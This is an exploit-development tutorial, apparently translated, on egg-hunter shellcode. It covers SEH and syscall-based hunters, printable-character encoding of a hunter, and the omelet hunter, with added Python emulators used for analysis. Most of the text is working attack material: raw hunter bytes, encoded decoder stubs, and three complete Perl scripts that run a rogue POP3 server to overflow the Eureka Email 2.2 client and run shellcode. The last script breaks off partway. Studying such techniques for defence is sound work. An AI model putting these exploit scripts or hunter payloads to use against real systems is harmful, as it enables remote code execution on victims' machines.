Egg hunting is a form of staged shellcode.
An egg hunter is a small piece of code that searches memory for the real (much larger) shellcode, the "egg".
In other words, we get a small piece of code executed, and that code then locates the real shellcode and executes it.
Three preconditions:
1) It must be possible to jump (jmp, call, push/ret) to and execute some shellcode. The usable buffer can be relatively small at this point, because it only has to hold the egg hunter code. The egg hunter must be placed at a predetermined location so that control can reliably be transferred to it and it gets executed.
2) The shellcode that is ultimately to be executed must exist somewhere in memory (heap or stack).
3) A unique tag must be placed directly in front of the final shellcode. The shellcode that runs first (the egg hunter) searches memory byte by byte for this tag; once the tag is found, a jmp/call instruction starts executing the code that follows it.
Known problems: 1) noticeable CPU usage for a period of time; 2) it can take a long time before the shellcode actually starts executing.
Technical basis:
1) The tag used must be unique (usually the first 4 bytes define the tag, and two consecutive copies of it, 8 bytes, are placed right in front of the real shellcode).
2) For a given exploit, test which memory-search technique works (e.g. NtAccessCheckAndAuditAlarm).
3) Different techniques need different amounts of space to store the egg hunter code:
1 The SEH-based egg hunter needs about 60 bytes:
```
00401580  EB 21          jmp Xtestexpl.004015A3
00401582  59             pop ecx
00401583  B8 70616E64    mov eax,0x646E6170        ; the "pand" tag
00401588  51             push ecx
00401589  6A FF          push -0x1
0040158B  33DB           xor ebx,ebx
0040158D  64:8923        mov dword ptr fs:[ebx],esp
00401590  6A 02          push 0x2
00401592  59             pop ecx
00401593  8BFB           mov edi,ebx
00401595  F3:AF          repe scas dword ptr es:[edi]
00401597  75 07          jnz Xtestexpl.004015A0
00401599  FFE7           jmp edi
0040159B  66:81CB FF0F   or bx,0xFFF
004015A0  43             inc ebx
004015A1  EB ED          jmp Xtestexpl.00401590
004015A3  E8 DAFFFFFF    call testexpl.00401582
004015A8  6A 0C          push 0xC
004015AA  59             pop ecx
004015AB  8B040C         mov eax,dword ptr ss:[esp+ecx]
004015AE  B1 B8          mov cl,0xB8
004015B0  830408 06      add dword ptr ds:[eax+ecx],0x6
004015B4  58             pop eax
004015B5  83C4 10        add esp,0x10
004015B8  50             push eax
004015B9  33C0           xor eax,eax
004015BB  C3             retn
```
The bytes from 004015A0 onward:
```
43 EB ED E8 DA FF FF FF 6A 0C 59 8B 04 0C B1 B8 83 04 08 06 58 83 C4 10 50 33 C0 C3
```
2 The IsBadReadPtr hunter needs 37 bytes.
3 NtDisplayString needs 32 bytes (NT kernel).
4 The NtAccessCheckAndAuditAlarm hunter:
```
L000:
    or dx,0xFFF
L001:
    inc edx
    push edx
    push 0x43            ; 0x43 selects NtDisplayString, 0x2 selects NtAccessCheckAndAuditAlarm
    pop eax
    int 0x2E
    cmp al,0x5           ; check 0xc0000005 == ACCESS_VIOLATION
    pop edx
    je L000
    mov eax,0x50905090   ; this is the egg
    mov edi,edx
    scas dword ptr es:[edi]
    jnz L001
    scas dword ptr es:[edi]
    jnz L001
    jmp edi
```
The assembled bytes (built with push 0x2, i.e. NtAccessCheckAndAuditAlarm, and the "pand" egg):
```
66 81 CA FF 0F 42 52 6A 02 58 CD 2E 3C 05 5A 74 EF B8 70 61 6e 64 8B FA AF 75 EA AF 75 E7 FF E7
```
As an escaped string:
```
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x70\x61\x6e\x64\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
```
70 61 6E 64 -> "pand"
Which egg hunter to use depends mainly on: 1) the buffer size available for running the egg hunter code; 2) whether the chosen memory-search technique actually works on your machine and with the exploit you are using, which has to be tested.
When is this technique used? 1) When part of the shellcode we insert gets altered; 2) when we do not know how many NOP bytes to put before the shellcode.
!mona egg -t pand
generates the egg hunter code.
Example: Eureka Email version 2.2
POP3 introduction: http://baike.baidu.com/view/5404.htm?fr=aladdin#3_7
Software download: http://www.eureka-email.com/VersionHistory.html
The configuration is as follows:
Plain PoC (with nothing in the way):
```perl
use Socket;
# Log data, item 109
# Address=7DCFD8E4
# Message=Found JMP ESP at 0x7dcfd8e4 Module: C:\WINDOWS\system32\SHELL32.dll
my $junk = "\x41" x 709;
my $ret  = pack('V', 0x7DCFD8E4);   # jump to ESP - run !pvefindaddr j -r ESP -n to find an address
my $shellcode = ("\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C".
                 "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53".
                 "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B".
                 "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95".
                 "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59".
                 "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A".
                 "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75".
                 "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03".
                 "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB".
                 "\x53".
                 "\x68\x64\x61\x30\x23".
                 "\x68\x23\x50\x61\x6E".
                 "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8");
my $payload = $junk.$ret.$shellcode;
my $port  = 110;
my $proto = getprotobyname('tcp');
socket(SERVER, PF_INET, SOCK_STREAM, $proto);
my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr);
listen(SERVER, SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
if ($client_addr = accept(CLIENT, SERVER)) {
    print "[+] Client Connected.\n";
    while (1) {
        # The POP server answers each command with "+OK" (success) or "-ERR" (failure) followed by a short text,
        # e.g. "+OK Password required for Bob" means USER succeeded and the client must now send its password.
        print CLIENT "-ERR".$payload."\n";
        print " ->Sent ".length($payload)." bytes\n";
    }
}
close CLIENT;
print "Connection closed\n";
```
The PoC built for today's main topic is as follows:
If the address of the shellcode changes, or the space available for the shellcode is very small, the egg hunting technique studied today is needed.
Simple egg hunting:
Still flawed: the shellcode can be found here because it sits in .data. If the shellcode were on the heap, an edx that is too large would skip straight past the shellcode's location.
```perl
use Socket;
# Log data, item 109
# Address=7DCFD8E4
# Message=Found JMP ESP at 0x7dcfd8e4 Module: C:\WINDOWS\system32\SHELL32.dll
my $junk = "\x41" x 709;
my $ret  = pack('V', 0x7DCFD8E4);   # jump to ESP - run !pvefindaddr j -r ESP -n to find an address
my $egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A".
                 "\x02".
                 "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
                 "\x70\x61\x6e\x64".
                 "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7");
my $padding = "\x42" x 1000;
my $shellcode = ("\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C".
                 "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53".
                 "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B".
                 "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95".
                 "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59".
                 "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A".
                 "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75".
                 "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03".
                 "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB".
                 "\x53".
                 "\x68\x64\x61\x30\x23".
                 "\x68\x23\x50\x61\x6E".
                 "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8");
my $payload = $junk.$ret.$egghunter.$padding."pandpand".$shellcode;
my $port  = 110;
my $proto = getprotobyname('tcp');
socket(SERVER, PF_INET, SOCK_STREAM, $proto);
my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr);
listen(SERVER, SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
if ($client_addr = accept(CLIENT, SERVER)) {
    print "[+] Client Connected.\n";
    while (1) {
        # The POP server answers each command with "+OK" (success) or "-ERR" (failure) followed by a short text,
        # e.g. "+OK Password required for Bob" means USER succeeded and the client must now send its password.
        print CLIENT "-ERR".$payload."\n";
        print " ->Sent ".length($payload)." bytes\n";
    }
}
close CLIENT;
print "Connection closed\n";
```
edx is used as the search address and incremented continuously, and memory is searched for the two eggs pandpand.
(Flaw: the shellcode is found here because it sits in .data. If the shellcode were on the heap, an edx that is too large would skip straight past the location of the shellcode; simply move the search start to a little before the eggs and begin searching from there.)
Once the two eggs are found, edi points at the shellcode right behind them (the two scasd instructions advance it), and the hunter finishes with jmp edi.
Summary of the weak spots:
1) the search position starts after the eggs;
2) memory holds several copies, some of which are corrupted (after all, only the first 8 bytes are checked).
For 1), modify the or dx,0xFFF so that the search position lands before the eggs.
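As an added example (not from the original post), the following Python models the NtAccessCheckAndAuditAlarm loop listed earlier and the two weak spots just summarised, over a constructed two-page memory image: the page-skip on ACCESS_VIOLATION and the double-tag check are modelled, the syscall itself is not. The addresses, the damaged copy and the payload stand-in are all constructed.

```python
PAGE = 0x1000

class Memory:
    """Constructed flat 32-bit address space: a dict of readable 4 KiB pages.
    Every other page is unmapped, which is what makes the probe return ACCESS_VIOLATION."""
    def __init__(self, pages):
        self.pages = pages                          # {page_base: bytes of length PAGE}

    def readable(self, addr):
        return (addr & ~(PAGE - 1)) in self.pages

    def dword(self, addr):
        """Read 4 bytes (may straddle pages); None if any byte is unmapped."""
        raw = bytearray()
        for a in range(addr, addr + 4):
            if not self.readable(a):
                return None
            raw.append(self.pages[a & ~(PAGE - 1)][a & (PAGE - 1)])
        return int.from_bytes(raw, "little")

def hunt(mem, start, tag=b"pand", limit=0x7FFFFFFF):
    """Model of the hunter loop: edx is the cursor; an unreadable page makes
    'or dx,0xFFF' + 'inc edx' step to the next page; a hit needs the tag twice in a row.
    Returns the address 'jmp edi' would land on, or None once `limit` is passed
    (the real stub never gives up; the limit is a convenience of this model)."""
    want = int.from_bytes(tag, "little")
    edx = start
    while edx < limit:
        edx += 1                                    # L001: inc edx
        if not mem.readable(edx):                   # int 0x2e answered 0xc0000005
            edx |= 0xFFF                            # L000: or dx,0xFFF -> next inc reaches the next page
            continue
        if mem.dword(edx) == want and mem.dword(edx + 4) == want:
            return edx + 8                          # edi now points right behind "pandpand"
    return None

def build_sample_memory():
    """Two mapped pages: the real eggs at 0x401200, a damaged copy (one tag only) at 0x401100."""
    page0 = bytes(PAGE)
    page1 = bytearray(PAGE)
    page1[0x100:0x108] = b"pand\x00\x00\x00\x00"    # corrupted copy: second tag missing
    page1[0x200:0x208] = b"pandpand"
    page1[0x208:0x20C] = b"\x90\x90\x90\x90"        # stands in for the payload behind the eggs
    return Memory({0x400000: page0, 0x401000: bytes(page1)})
```

Starting the cursor at 0x3FF000 (unmapped) finds the eggs at 0x401200; starting it at 0x401208, i.e. after the eggs, never does, which is weak spot 1).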
Next we look at encoding/decoding the egg hunter to remove bad characters.
The NtDisplayString / NtAccessCheckAndAuditAlarm hunter is the one encoded here:
```
L000:
    or dx,0xFFF
L001:
    inc edx
    push edx
    push 0x43            ; 0x43 selects NtDisplayString, 0x2 selects NtAccessCheckAndAuditAlarm
    pop eax
    int 0x2E
    cmp al,0x5           ; check 0xc0000005 == ACCESS_VIOLATION
    pop edx
    je L000
    mov eax,0x50905090   ; this is the egg
    mov edi,edx
    scas dword ptr es:[edi]
    jnz L001
    scas dword ptr es:[edi]
    jnz L001
    jmp edi
```
Its 32 bytes split evenly into rows of 4:
```
66 81 CA FF
0F 42 52 6A
02 58 CD 2E
3C 05 5A 74
EF B8 70 61
6e 64 8B FA
AF 75 EA AF
75 E7 FF E7
```
Encode the last row first: 75 e7 ff e7, byte order reversed (little-endian dword) -> e7 ff e7 75, negated (0 minus it) -> 18 00 18 8b. Then find three numbers whose sum equals that negated value, using only ASCII-printable characters other than the four bytes x40 x3f x3a x2f; the three values are the operands of sub eax,<...> instructions. Because each decoded value is pushed onto the stack, encoding starts with the last row; once the last value has been pushed, ESP points to the first byte of the decoded egg hunter. Take the first byte, here 18: three numbers must add up to 18, so the sum has to overflow to produce 18. The first number is usually a value between 0x55 (85, since 85 x 3 = 255 overflows; 0x20, the space, is the smallest and 0x7f = 127 the largest ASCII-printable character) and 0x7f.
Note that the sums below include the carry coming in from the lower byte.
```
Last row:           75 e7 ff e7 -> e7 ff e7 75 -> 18 00 18 8b
    18 -> 118:      5d + 5d + 5d
    00 -> 255 (ff): 55 + 55 + 55
    18 -> 118:      5d + 5d + 5e
    8b:             30 + 30 + 2b
    sub eax,0x5d555d30 / sub eax,0x5d555d30 / sub eax,0x5d555e2b   ; the three add up to 0x11800188b, i.e. the dword 0x1800188b

Second-to-last:     af 75 ea af -> af ea 75 af -> 50 15 8a 51
    50 -> 150:      70 + 70 + 6f
    15 -> 115:      5c + 5c + 5d
    8a:             2e + 2e + 2d
    51 -> 151:      70 + 70 + 71
    sub eax,0x705c2e70 / sub eax,0x705c2e70 / sub eax,0x6f5d2d71   ; sum 0x150158a51 -> 0x50158a51

Third-to-last:      6e 64 8b fa -> fa 8b 64 6e -> 05 74 9b 92
    05 -> 105:      57 + 57 + 56
    74 -> 174:      7c + 7c + 7c
    9b:             33 + 33 + 35
    92:             30 + 30 + 32
    sub eax,0x577c3330 / sub eax,0x577c3330 / sub eax,0x567c3532   ; sum 0x105749b92 -> 0x05749b92

Fourth-to-last:     ef b8 70 61 -> 61 70 b8 ef -> 9e 8f 47 11
    9e:             34 + 34 + 36
    8f:             2f + 2f + 30
    47 -> 147:      6d + 6d + 6c
    11 -> 111:      5b + 5b + 5b
    sub eax,0x342f6d5b / sub eax,0x342f6d5b / sub eax,0x36306c5b   ; sum 0x9e8f4711

Fifth-to-last:      3c 05 5a 74 -> 74 5a 05 3c -> 8b a5 fa c4
    sub eax,0x30305342 / sub eax,0x30305341 / sub eax,0x2b455441   ; sum 0x8ba5fac4

Sixth-to-last:      02 58 cd 2e -> 2e cd 58 02 -> d1 32 a7 fe
    sub eax,0x46663054 / sub eax,0x46663055 / sub eax,0x44664755   ; sum 0xd132a7fe

Seventh-to-last:    0f 42 52 6a -> 6a 52 42 0f -> 95 ad bd f1
    sub eax,0x31393e50 / sub eax,0x32393e50 / sub eax,0x323b4151

First row (encoded last):
    sub eax,0x55703533 / sub eax,0x55702533 / sub eax,0x55552434
```
In front of each of these blocks, code that zeroes eax must be placed: and eax,0x554e4d4a and and eax,0x2a313235 (the two masks OR to 7f7f7f7f and AND to zero), two 5-byte instructions (25 4A 4D 4E 55 25 35 32 31 2A).
Each block must also contain a push eax that pushes the result onto the stack.
Each block is 10 (zero eax) + 15 (decode) + 1 (push eax) = 26 bytes; the 8 blocks take 208 bytes.
The egg hunter is placed on the stack, and execution itself will flow into that stack address shortly. The bytes for the above:
```
25 4A 4D 4E 55 25 35 32 31 2A 2D 30 5D 55 5D 2D 30 5D 55 5D 2D 2B 5E 55 5D 50 25 4A 4D 4E 55 25
35 32 31 2A 2D 70 2E 5C 70 2D 70 2E 5C 70 2D 71 2D 5D 6F 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 30
33 7C 57 2D 30 33 7C 57 2D 32 35 7C 56 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 5B 6D 2F 34 2D 5B 6D
2F 34 2D 5B 6C 30 36 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 42 53 30 30 2D 41 53 30 30 2D 41 54 45
2B 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 54 30 66 46 2D 55 30 66 46 2D 55 47 66 44 50 25 4A 4D 4E
55 25 35 32 31 2A 2D 50 3E 39 31 2D 50 3E 39 32 2D 51 41 3B 32 50 25 4A 4D 4E 55 25 35 32 31 2A
2D 33 35 70 55 2D 33 25 70 55 2D 34 24 55 55 50
```
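As an added example (not from the original post), the following Python emulates the decoder bytes above, which is how an analyst checks what a printable-only stub actually reconstructs: it interprets the and/sub/push sequence, collects the pushed dwords and compares the result with the plain 32-byte hunter listed earlier. Both byte strings are copied from this page; no other input is assumed.

```python
import struct

# The encoded decoder exactly as listed above: eight 26-byte blocks
# (and eax,imm32 twice; sub eax,imm32 three times; push eax), all bytes ASCII-printable.
ENCODED_HUNTER = bytes.fromhex("""
25 4A 4D 4E 55 25 35 32 31 2A 2D 30 5D 55 5D 2D 30 5D 55 5D 2D 2B 5E 55 5D 50 25 4A 4D 4E 55 25
35 32 31 2A 2D 70 2E 5C 70 2D 70 2E 5C 70 2D 71 2D 5D 6F 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 30
33 7C 57 2D 30 33 7C 57 2D 32 35 7C 56 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 5B 6D 2F 34 2D 5B 6D
2F 34 2D 5B 6C 30 36 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 42 53 30 30 2D 41 53 30 30 2D 41 54 45
2B 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 54 30 66 46 2D 55 30 66 46 2D 55 47 66 44 50 25 4A 4D 4E
55 25 35 32 31 2A 2D 50 3E 39 31 2D 50 3E 39 32 2D 51 41 3B 32 50 25 4A 4D 4E 55 25 35 32 31 2A
2D 33 35 70 55 2D 33 25 70 55 2D 34 24 55 55 50
""")

# The 32-byte NtAccessCheckAndAuditAlarm hunter the stub is supposed to rebuild.
PLAIN_HUNTER = bytes.fromhex(
    "66 81 CA FF 0F 42 52 6A 02 58 CD 2E 3C 05 5A 74 "
    "EF B8 70 61 6E 64 8B FA AF 75 EA AF 75 E7 FF E7")


def emulate_decoder(code):
    """Interpret only the three instruction forms the stub uses and return the bytes
    that sit at ESP once the last push has happened, i.e. what executes next."""
    eax, pc = 0, 0
    below_esp = bytearray()              # memory below the original ESP, lowest address first
    while pc < len(code):
        op = code[pc]
        if op in (0x25, 0x2D):           # and eax,imm32 / sub eax,imm32 (5 bytes each)
            imm = struct.unpack_from("<I", code, pc + 1)[0]
            eax = eax & imm if op == 0x25 else (eax - imm) & 0xFFFFFFFF
            pc += 5
        elif op == 0x50:                 # push eax: the dword lands just below the previous push
            below_esp[0:0] = struct.pack("<I", eax)
            pc += 1
        else:
            raise ValueError("opcode %#04x at offset %d is not part of the decoder" % (op, pc))
    return bytes(below_esp)


def is_printable(code):
    """True when every byte survives a filter that only passes ASCII 0x20..0x7e."""
    return all(0x20 <= b <= 0x7E for b in code)


def block_count(code):
    """One block per decoded dword: 10 (zero eax) + 15 (three subs) + 1 (push) = 26 bytes."""
    return len(code) // 26
```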
Here the edx-too-large case shows up again, with the hunter skipping past the shellcode.
Add one more instruction, and edx,0 (the PoC below uses and edx,0x1, bytes 83 E2 01), to shrink edx, and watch the total length, because the decoder has to run straight into the egg hunter it pushed onto the stack. PoC:
```perl
use Socket;
# Log data, item 109
# Address=7DCFD8E4
# Message=Found JMP ESP at 0x7dcfd8e4 Module: C:\WINDOWS\system32\SHELL32.dll
my $junk = "\x41" x 709;
my $ret  = pack('V', 0x7DCFD8E4);   # jump to ESP - run !pvefindaddr j -r ESP -n to find an address
my $egghunter = ("\x61\x61\x61\x61\x61\x61\x61\x61".
    "\x25\x4A\x4D\x4E\x55". "\x25\x35\x32\x31\x2A".   # zero eax
    "\x2D\x30\x5D\x55\x5D". "\x2D\x30\x5D\x55\x5D". "\x2D\x2B\x5E\x55\x5D". "\x50".
    "\x25\x4A\x4D\x4E\x55". "\x25\x35\x32\x31\x2A".   # zero eax
    "\x2D\x70\x2E\x5C\x70". "\x2D\x70\x2E\x5C\x70". "\x2D\x71\x2D\x5D\x6F". "\x50".
    "\x25\x4A\x4D\x4E\x55". "\x25\x35\x32\x31\x2A".   # zero eax
    "\x2D\x30\x33\x7C\x57". "\x2D\x30\x33\x7C\x57". "\x2D\x32\x35\x7C\x56". "\x50".
    "\x25\x4A\x4D\x4E\x55". "\x25\x35\x32\x31\x2A".   # zero eax
    "\x2D\x5B\x6D\x2F\x34". "\x2D\x5B\x6D\x2F\x34". "\x2D\x5B\x6C\x30\x36". "\x50".
    "\x25\x4A\x4D\x4E\x55". "\x25\x35\x32\x31\x2A".   # zero eax
    "\x2D\x42\x53\x30\x30". "\x2D\x41\x53\x30\x30". "\x2D\x41\x54\x45\x2B". "\x50".
    "\x25\x4A\x4D\x4E\x55". "\x25\x35\x32\x31\x2A".   # zero eax
    "\x2D\x54\x30\x66\x46". "\x2D\x55\x30\x66\x46". "\x2D\x55\x47\x66\x44". "\x50".
    "\x25\x4A\x4D\x4E\x55". "\x25\x35\x32\x31\x2A".   # zero eax
    "\x2D\x50\x3E\x39\x31". "\x2D\x50\x3E\x39\x32". "\x2D\x51\x41\x3B\x32". "\x50".
    "\x25\x4A\x4D\x4E\x55". "\x25\x35\x32\x31\x2A".   # zero eax
    "\x2D\x33\x35\x70\x55". "\x2D\x33\x25\x70\x55". "\x2D\x34\x24\x55\x55". "\x50".
    "\x83\xE2\x01");                                  # one extra and edx,0x1 to make edx smaller
my $padding = "\x42" x 1000;
my $shellcode = ("\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C".
                 "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53".
                 "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B".
                 "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95".
                 "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59".
                 "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A".
                 "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75".
                 "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03".
                 "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB".
                 "\x53".
                 "\x68\x64\x61\x30\x23".
                 "\x68\x23\x50\x61\x6E".
                 "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8");
my $payload = $junk.$ret.$egghunter.$padding."pandpand".$shellcode;
my $port  = 110;
my $proto = getprotobyname('tcp');
socket(SERVER, PF_INET, SOCK_STREAM, $proto);
my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr);
listen(SERVER, SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
if ($client_addr = accept(CLIENT, SERVER)) {
    print "[+] Client Connected.\n";
    while (1) {
        # The POP server answers each command with "+OK" (success) or "-ERR" (failure) followed by a short text,
        # e.g. "+OK Password required for Bob" means USER succeeded and the client must now send its password.
        print CLIENT "-ERR".$payload."\n";
        print " ->Sent ".length($payload)." bytes\n";
    }
}
close CLIENT;
print "Connection closed\n";
```
For the Unicode version of egg hunting, see http://blog.csdn.net/zcc1414/article/details/27363377
Next we look at the
Omelet egg hunter
No encoding to worry about: the shellcode is simply split into pieces.
Tool download: http://www.mediafire.com/download/q5c0gbi55x91cv2/w32+SEH+omelet+shellcode+v0.2+fixed+by+UND3R.rar
The NASM file contains the egg hunter code; the PY script does the shellcode splitting.
```
nasm.exe -f bin -o w32_omelet.bin w32_SEH_omlet.asm -w+error
w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes]
```
The generated file contains the omelet egg hunter and the small chunks of code that have to be placed somewhere in memory:
```
w32_SEH_omelet.py w32_omelet.bin shellcode.bin 1.txt 100 0x70616e
```
(the marker 0x70616e is "pan")
```perl
$omelet_code = "\x31\xFF\xBB\xFE\xFF\xFF\xFF\xEB\x29\x51\x64\x89\x20\xFC\xB0\x5F\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x6E\x61\x70\x83\xF8\x02\x77\x12\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x83\xFB\xFF\x74\x25\x43\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x83\xF9\xFF\x75\xF8\x5A\xE8\xC4\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDE\x31\xC0\x64\xFF\x50\x08";
# It turned out later that the first two bytes here (xor edi,edi) have to be NOPed out.
# These are the eggs that need to be injected into the target process
# for the omelet shellcode to be able to recreate the original shellcode
# (you can insert them as many times as you want, as long as each one is
# inserted at least once). They are 100 bytes each:
$egg0 = "\x5F\xFF\x6E\x61\x70\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06";
$egg1 = "\x5F\xFE\x6E\x61\x70\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x64\x61\x30\x23\x68\x23\x50\x61\x6E\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
# The first 5 bytes hold: 5F = size = 95, index = ff / fe, marker = 6e 61 70 -> 0x70616e; header + body = 95 + 5 = 100.
# The bytes after that are cut straight out of the original shellcode; spare space is filled with 0x40. The original shellcode is 168 bytes.
```
Find where the shellcode sits: !mona cmp -f c:1egg1.bin
Once that is done, it jumps to the following and continues:
```
0012CDC0  31C0        XOR EAX,EAX
0012CDC2  64:FF50 08  CALL DWORD PTR FS:[EAX+8]
```
i.e. it jumps into the copied bytes, the reassembled shellcode, and executes them (FS:[8] is the TEB's StackBase, where the omelet hunter rebuilt the shellcode).
The files used in this article have been modified from the original version (the original article itself was edited later); only the first two bytes need to be NOPed out.
PoC:
```perl
use Socket;
# Log data, item 109
# Address=7DCFD8E4
# Message=Found JMP ESP at 0x7dcfd8e4 Module: C:\WINDOWS\system32\SHELL32.dll
my $junk = "\x41" x 712;
my $ret  = pack('V', 0x7DCFD8E4);   # jump to ESP - run !pvefindaddr j -r ESP -n to find an address
my $omelet_code = "\x90\x90\xBB\xFE\xFF\xFF\xFF\xEB\x29\x51\x64\x89\x20\xFC\xB0\x5F\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x6E\x61\x70\x83\xF8\x02\x77\x12\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x83\xFB\xFF\x74\x25\x43\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x83\xF9\xFF\x75\xF8\x5A\xE8\xC4\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDE\x31\xC0\x64\xFF\x50\x08";
# These are the eggs that need to be injected into the target process
# for the omelet shellcode to be able to recreate the original shellcode
# (you can insert them as many times as you want, as long as each one is
# inserted at least once). They are 100 bytes each:
my $egg0 = "\x5F\xFF\x6E\x61\x70\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06";
